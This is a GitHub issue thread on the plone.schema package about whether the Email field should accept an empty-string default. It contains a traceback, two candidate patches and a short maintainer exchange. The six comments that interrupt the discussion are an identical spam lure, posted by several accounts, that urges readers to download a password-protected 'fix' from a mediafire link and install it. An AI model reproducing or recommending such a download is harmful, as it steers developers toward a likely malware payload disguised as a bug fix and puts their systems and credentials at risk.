### ISSUE TITLE
Should email validation kick in with an empty string?

### ISSUE THREAD

**Issue by ale-rt** [plone/plone.schema#35]
In the `Email` field definition:
https://github.com/plone/plone.schema/blob/50d95d15a6452bd8c93aff9625deb182175143d9/plone/schema/email.py#L26-L40
 we have a `_validate` method that checks if the provided value is a valid email.

The `_validate` method is called when the field instance is created with a `default` which is not `None`
An empty string is not a valid email, for this reason this will cause this an error:

```python
>>> from plone import schema
>>> schema.Email(default="")
Traceback (most recent call last):
  File "<console>", line 1, in <module>
  File "/home/ale/.buildout/eggs/cp311/zope.schema-7.0.1-py3.11.egg/zope/schema/_bootstrapfields.py", line 530, in __init__
    super(Text, self).__init__(*args, **kw)
  File "/home/ale/.buildout/eggs/cp311/zope.schema-7.0.1-py3.11.egg/zope/schema/_bootstrapfields.py", line 507, in __init__
    super(MinMaxLen, self).__init__(**kw)
  File "/home/ale/.buildout/eggs/cp311/zope.schema-7.0.1-py3.11.egg/zope/schema/_bootstrapfields.py", line 268, in __init__
    self.default = default
    ^^^^^^^^^^^^
  File "/home/ale/.buildout/eggs/cp311/zope.schema-7.0.1-py3.11.egg/zope/schema/_bootstrapfields.py", line 83, in __set__
    inst.validate(value)
  File "/home/ale/.buildout/eggs/cp311/zope.schema-7.0.1-py3.11.egg/zope/schema/_bootstrapfields.py", line 295, in validate
    self._validate(value)
  File "/home/ale/.buildout/eggs/cp311/plone.schema-2.0.1-py3.11.egg/plone/schema/email.py", line 35, in _validate
    raise InvalidEmail(value)
plone.schema.email.InvalidEmail
```

If instead the default is `None` the `_validate` method is not called.
```python
>>> schema.Email(default=None)
<plone.schema.email.Email object at 0x756d6d2723d0 <unknown>>
```

I think that it is perfectly valid to set for an email field a default equal to an empty string.
Am I wrong?

If not, I can provide a PR with a patch like:
```python
    def _validate(self, value):
        if value == "":
            return
        super()._validate(value)
        if _isemail(value):
            return
```
or:
```python
    def _validate(self, value):
        if not value:
            return
        super()._validate(value)
        if _isemail(value):
            return
```

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by davisagli** [comment]
> I think that it is perfectly valid to set for an email field a default equal to an empty string.

I don't understand your reasoning. It's a field for entering email addresses, and an empty string is not an email address. Why do you want to set the default to an empty string?

**Comment by ale-rt** [comment]
> > I think that it is perfectly valid to set for an email field a default equal to an empty string.
> 
> I don't understand your reasoning. It's a field for entering email addresses, and an empty string is not an email address. Why do you want to set the default to an empty string?

In this way, the default has the same type of the accepted values.

**Comment by davisagli** [comment]
> In this way, the default has the same type of the accepted values.

But it's still not a valid email address, and should not pass validation.
